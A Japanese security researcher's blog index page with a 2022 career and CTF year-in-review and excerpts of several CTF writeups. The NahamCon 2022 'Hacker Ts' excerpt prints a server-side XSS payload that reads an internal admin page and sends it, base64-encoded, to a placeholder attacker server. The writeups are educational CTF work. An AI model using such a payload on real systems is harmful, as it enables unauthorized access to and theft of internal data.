きなこもち。

(´・ω・`)

2022年の振り返り

時系列

1~3月

  • 去年から引き続きRailsメインのバックエンドエンジニアとして働いていました

    • 既存のRails APIの保守とちょっとした開発を担当してました
    • 今も動いてるのかな...
  • 去年からGo言語を書いて仕事をしたいと思っていたのですが、ついに叶わず、自ら新設のセキュリティの部署へ異動を願い出ました

    • JWTのハンズオンをGoで書いたのもこのアピールだったりするのですが、私は選ばれませんでした。無念...
  • 3月に初めて2つduplicateでないバグをHackeroneに報告し、ちょっとしたお金とswag(Tシャツ)をもらえました!

    • developerとして働きつつのバグハントはかなり厳しかったですが、どんなに小さくとも去年から勉強していたバグハントでの成果が出てよかったです...(・ω・;)
    • ちなみに最初のバグはDOM-based XSSで、過去にCTFで出題されたテクニックを用いてexploitまで繋げたので、やはり学んだことは無駄にならんなぁと思いました
    • このバグのストーリーを元に某大学のサークル向けにプレゼンする予定だったのですが、転職でお蔵入りになりました😉

4~7月

  • 新部署でセキュリティをやる予定でしたが、色々あって転職を決意しました

    • ここに関しては後述で詳しく書きます〜
  • 最終出社日後の有休消化でフリーだったので北海道行ってきました

    • 外国人と話していると「日本行くなら北海道に行ってみたい」と言う人が比較的多く、そういえば自分は日本人なのに行ったことないなーと思ってたので北海道に決めました
    • アイスクリーム屋が多く、食べすぎて無事お腹壊しました。他に味噌ラーメンが美味しかったです🍜
  • 4月に開催されたNahamCon CTF 2022に出場し、一人でweb問を全部解きました💯

    • writeup→https://kinako-mochimochi.hatenablog.com/entry/2022/05/01/073316
    • NahamCon CTFには腕試しで必ず出場するように心がけており、当時は一人でhard1問でも解けたらいいな...くらいの気持ちだったのですが、1つ、また1つとhard問が解けて最終的に全部解けてしまいましたw
    • Deafconという問題は10時間以上粘りました、一生忘れないと思います😂

ちなみにCTFerなら誰もが知っている某CTF Youtuberの方が作問者の一人だったらしく、Twitterでいいねをもらえて感激でした。

  • また、この頃HTBのactiveなweb challenge埋めを始め、現在は11/16埋めてます
    • activeならExpressionalRebelという問題が面白かったです。解けた時「おおー!」と叫んでしまいました
    • retireしてしまったのですがSpiky TamagotchiとDebugger Unchainedもかなり良かったです。後者は作問者の意図を完璧に読み切った感があるの思い出深いです笑
    • HTBのweb問はNodejs製が多めでローカルで動かしやすいので本当助かります...

8~12月

新しい職場についても後述しますので別のことを書きます

  • 外国のCTFチームTask_Hashed(現/bin/cat)にお誘いいただきjoinしました!(https://ctftime.org/team/211363/)
    • 最初は軽い気持ちでDiscordに入ったのですが、予想以上にレベルが高く、楽しくやれそうなので正式に加入しましたw
    •  HTBに問題を提供しているプレイヤーなどがいて、本当に驚くばかりです...(o_o)
    • 来年は/bin/catのメンバーとして暴れるぜ😎

/bin/cat

Thanks!😎

  • OCSPに落ちました😭
    • 最初の数時間で50点確保し、「勝ったな(確信)」と余裕の表情でAD攻略を始めたのですが、途中で次のステップに進む手がかりが全くわからず、10時間以上enumし続けましたが最後まで分からずギブアップしました...
    • HTB含め何十ものWindowsマシンを経験してきましたが、冗談抜きで一番固い環境だったと思います
    • 今でも何が悪かったのか分からないんですよね...😐
    • 次回は6週間後とのことで、暇なのでC#マルウェア開発と解析の両方を勉強して備えてます...

転職

転職を決意したきっかけ

転職について本格的に考え出したのは去年の秋頃です。

当時はTerraform+AWSで分析基盤構築の仕事を終えAPIサーバ保守の仕事に戻ったのですが、基本一人の仕事だったのでかなり孤独でした。

また、仕事内容についてもRailsAPIサーバの保守メインだったので「これでスキルが身につくのだろうか」と内心焦っていました。

新たに作成するAPIは既存のものをコピーして少しロジックを変えるだけで大体事足りるので、高いRailsの専門性が身に付くことはないと思っていましたし、何より社内でGo言語を大々的に推進している中このままだと置いていかれるのではないかと不安しかなかったです...

状況を変えるべく4月に部署異動などを経験させていただいたのですが、諸事情あって異動前より精神的に厳しい状況に置かれてしまったので本格的に転職をスタートさせました。

(異動を申し出ておいてめちゃくちゃ自分勝手ですね、前職の人々には申し訳ないです)

応募、面接、内定まで

転職にあたり以下のようなツイートをしたのですが、これをきっかけにペンテスターとしての仕事の紹介を3件ほどいただきました!

Twitter最強です!他の転職系SNSはいりませんでした!

最終的に1番早く内定を頂いた現職に決め、転職活動は終了しました。

(今回ご縁がありませんでしたが、他のお誘いいただいた方々もありがとうございました🙇‍♂️)

端的に書くと、4月に転職決意&一次面接、5月に技術適正チェック&二次面接、6月上旬内定、7月に以前の職場を退職&夏休み、という感じでした。

面接でアピールしたこと

前述の通り、当時ちょうどH1にバグを報告してバウンティをもらう経験をしたり、NahamCon CTFでweb問全完したのでそのことを話せたのは大きかったと思います。

また、2年前にオンサイトのペンテスト大会で2位を取っていたのでそのことも全力でアピールしましたね😅

OSCPなどの資格を持っていないので不利かと思いましたが、前述の3つで十分カバーできた...かな?

転職の感想

最高です!

本来はペンテスターになれたらいいなーと思っていたくらいなのですが、期待以上の業務ができて本当に恵まれてます。

そして資格や教材は会社持ちで受け放題ですし、なにより仕事も他社ではなかなかできないようなことができるので楽しいです😁

年収については具体的な金額を書きませんが、前職に比べると大幅にアップし福利厚生も手厚くなったので今のところ待遇に不満は0ですね。

加えて1日の勤務時間が7.5時間なのが地味に嬉しいです。

しかし外資なので、レイオフされないように頑張ってます😂

その他

最近はwebセキュリティをお休みして、今までは自分と無縁だと思って手を出してこなかったマルウェアやC2サーバなどの分野を優先的に勉強しています。

バグバウンティなどもやりたいのは山々ですが、今の職場でしかできないことを優先したいのでしばらくはマルウェアなどの勉強に集中することになりそうです。

CTFはコミットの頻度を上げたいのでwebセキュリティ要素はそこで補完する感じになりそうです。

来年の目標

  • OffSecの資格たくさん取る!

    • せめてOSWEは合格したいです🤢
  • CTFもっと精進したい

    • 来年はもっとハイレベルなCTFでsolveを稼ぎたいですね
    • マルウェア解析と並行してrevやforensicもブラッシュアップしていく予定です💪
    • /bin/catでgo-go🚀
  • 猫島に行く🐈

tobimike.com

というわけで短いですが2022年の振り返りでした〜来年もよろしくお願いします〜!

NahamCon CTF 2022 wirteup【Web Challenges ONLY】

In this writeup, I will write down only HARD web challenges in NahamCon CTF 2022 (sorry, I'm very lazy....)

  • Hacker Ts【SSRF via Server-Side XSS
    • basic information
    • exploit
  • Two For One【Account Takeover via Blind XSS
    • basic information
    • exploit
      • Step 1: Detect Blind XSS
      • Step 2: Use XSS to reset admin OTP
  • Deafcon【RCE via Jinja2 SSTI】
    • basic information
    • exploit
      • Step 1: Identify "where the vulnerable point is"
      • Step 2: How to bypass parentheses filter😭😭😭
      • Step 3: Use full-width parentheses to bypass filter
  • Poller【RCE via Django Pickle insecure deserialization with credential leak】
    • basic information
    • exploit
      • Step 1: Get SECRET_KEY in .env from public repository
      • Step 2: Craft Pickle RCE payload with SECRET_KEY
  • Results
  • Comment

Hacker Ts【SSRF via Server-Side XSS

TLDR: We can perform Server-Side XSS and this leads to disclosure of Admin page content via SSRF

Author: @congon4tor#2334 We all love our hacker t-shirts. Make your own custom ones.

Hacker Ts challenge

basic information

  • we can reflect "Command" string input on T-shirt
  • There is "Admin" page but we cannot access(403 Forbidden)

exploit

If you input <s>HTML injection</s>, then you'll notice your input is rendered as raw HTML like this:

<s> works!

And <script>document.write(1)</script> also works correctly(1 will be reflected).

We can perform "Server-Side XSS".

Payload:

<script>
x=new XMLHttpRequest;
x.onload=function(){var i = new Image(1,1); i.src = "https://<myserver>/?c=" + btoa(this.responseText)};
x.open("GET","http://localhost:5000/admin");x.send();
</script>
続きを読む

2021年のプチ振り返り

書いていきます (「・ω・)「

1~3月

  • 過去の日報とか見るとこの頃はpwnを大真面目に学習していたようです

    • null-freeなshellcodeをアセンブリ言語から構築したとか、syscallなしのshellcode構築に5時間くらいかけたのを今でも思い出に残ってます
    • あとforkしてるプログラムのstack canaryを1バイトずつリークしていく問題を解いたり、heapの問題の勉強とか
      • Kernelあたりから謎of謎になりました...笑
      • 解説読んでも分からない=まだ自分が取り組むべきでない、と定義しているのですがまさにそんな感じに
  • 自分のチームであるsh -a ./chikuを結成しました!!

    • 社会人になってからセキュリティ始めた人たちで構成されてます
    • 最初はCTFオンリーだったのですが、割とペネトレなどにも興味あるメンバーが多かったので今では色々やってます
      • meetupで1番盛り上がるのもOffensive Security周りの試験とかの話だったり
      • angstromCTFという1500チームくらい参加してた大会で96位取って以来、大規模な活動がなくなっている気がw
  • あとNahamCon CTF 2021にも出てたみたいです→https://kinako-mochimochi.hatenablog.com/entry/2021/03/15/232757

    • SMTP Injectionは面白かった
続きを読む

HactivityCon 2021 CTF Web challenge writeup

I participated in HacktivityCon CTF 2021 that held on September 16, 1:30 PM PST - September 18, 1:30 PM PST.

This is my writeup.(Web challenge only!)

  • Medium
    • All Baked Up(SQLi via GraphQL, 114 solves)
      • Recon
      • Solution
    • Integrity(OS command injection, 256 solves)
      • Recon
      • Solution
  • Hard
    • Availability(Blind OS command injection, 115 solves)
      • Recon
      • Solution
      • memo
    • OPA Secrets(SSRF, 136 solves)
      • Recon
      • Solution
    • Unpugify(CVE, 45 solves)
      • Recon
      • Solution
      • memo
  • Conclusion
続きを読む

WaniCTF2021 Spring writeup

WaniCTF2021 Springに個人で参加し、Webは全完、PwnはVery hardを残して6問、Dockerを勉強してたのでDockerに関連するMiscを1問解きました。 このうち、Hard以上のもの&面白かったものをwriteupで書いていこうと思います。

f:id:kinako_mochimochi:20210503000324p:plain
相変わらずスコアボードが美しい!

  • Web
    • Exception(Easy, sensitive info leak)
      • Analysis
      • Solution
      • Payload
      • Flag
    • CloudFront Basic Auth(Hard, Access Control Misconfiguration)
      • Analysis
      • Solution
      • Payload
      • Flag
    • watch animal(Very Hard, Blind SQLi)
      • Analysis
      • Solution
      • Payload
      • Flag
  • Pwn
    • SuperROP(Hard)
      • Analysis
      • Solution
      • Payload
      • Flag
  • 感想
    • 余談
続きを読む

2021年Q1(1~3月)振り返り

お久しぶりです!CTFのwriteup以外では約3ヶ月ぶりの投稿となります! 最近は忙しくてロクに振り返りの記録などがつけられていないので、有給とった今のうちに軽く振り返っておきます。

1月

やったこと

  • Pwnの基礎固め(shellcode問とか、forkサーバでのcanaryの読み出しなど)
  • TryHackMeで1日一マシン攻略

読んだ本

Black Hat Ruby

Black Hat Ruby: Offensive Ruby programming for Hackers and Pentesters

Black Hat Ruby: Offensive Ruby programming for Hackers and Pentesters

  • セキュリティというよりは、Rubyってこんなライブラリあるんだよーみたいな本でした(・ω・;)

LPICレベル1

  • 読んでよかったです。Pwnでrace conditionなどがあるのですが、reniceコマンドなどで優先度を変えると発生しやすくなるなどの話がすんなりはいってきました。(以前はnice値とか知らなかった)
  • LPIC受けなくてもLPIC3の参考書までやろうかな?と模索中。

メモ

  • 会社でつけてる日報見たら、セキュリティ関連ではえぐい量の教材こなしてました
    • shellcodeに関しては自分でNULLbyteなしとか0x48縛り(mov命令とかでよく出てくるバイト)のshellcodeとか作ってて、かなーり勉強になりました
  • Heap問に関しては改めてheap領域でtcacheがある場合とない場合でどう動きが違うのか、UAFのやり方などを学んでいた感じです
    • ただカーネル問はもう意味がわからないです...
  • 仕事の方でも、納期が近づいてきたので忙しくなってきたところでした。当時の日報にも「○○を今日までに完成させる」という記述が多いです

2月

やったこと

  • Pwnの基礎固め(fastbin attackとか)
  • 仕事(›´ω`‹ )

読んだ本

一冊も読みきれてないみたいです...

メモ

  • 社の日報を見てると、2月が最も忙しかったようです
    • プライベートの勉強、何やってたのか思い出せないんですよね...笑
    • 当時のツイートを見ると、fastbin dupでoverwrite成功とかあって、ある程度頑張ってたんだなあと

3月

やったこと

  • 仕事(›´ω`‹ )
  • nahamcon CTF
  • 個人チームsh -a ./chiku結成!

読んだ本

日報によるとUdemyのReactの講義受けてたようです。

メモ

  • nahamcon CTFは良問揃いで、個人的には手応えを感じたCTFでした。

kinako-mochimochi.hatenablog.com

  • 結成したてのチームsh -a ./chikuはangstrom CTFで96位で大健闘しました!
    • sh -a ./chikuはまだ結成間もないのでこのエントリではあまり触れられずごめんなさい😞
  • 月末が納期だったので3月は非常に忙しかったです。プロジェクトは成功に終わりましたが、次のプロジェクトの勉強で今(›´ω`‹ )←こんな感じです

まとめ

  • 実は3月末にひどい風邪をひき、それ以来咳が止まらなくなってしまいました...(これ書いてる間も咳き込んでます)
    • 熱や鼻水、倦怠感はないのでコロナとか肺炎ではないとは思いますが、咳で失われるエネルギーが大きく、もうダメ(´・ω・`)
  • angstrom CTFのwriteupを書く時間もないくらい仕事が忙しいですorz
    • 現在は仕事の影響でプライベートの時間をほぼAWSなんかに充てていますが、月末くらいにはまたCTFやペンテストを再開できるといいな〜と思っています!

皆さんくれぐれも病気にはお気をつけてください...(ヽ’ω`) 短いですが、振り返りは以上です!読んでくださりありがとうございました〜!

NahamCon CTF 2021 writeup【web,pwn】

f:id:kinako_mochimochi:20210315214557p:plain
NahamCon CTF 2021

  • 3/13~3/14に行われたNahamCon CTF 2021にチームsh -a ./chikuとして出場し、Webの$Echo,Asserted, Bad Blog、PwnのRet2basicThe Listを解きました。(miscは省略します)
  • このうち、簡単なRet2basic以外の問題のwriteupを残したいと思います

Index

  • Index
  • Web
    • $Echo [os command injection, easy]
      • Investigation
      • Exploit
    • Asserted [LFI and os command injection, medium ]
      • Investigation
      • LFI?
      • RCE via assert()
      • Exploit
    • Bad blog[SQLi, medium ]
  • Pwn
    • The List[BOF?, easy ]

f:id:kinako_mochimochi:20210315215118p:plain
スコアボードかっこいい

続きを読む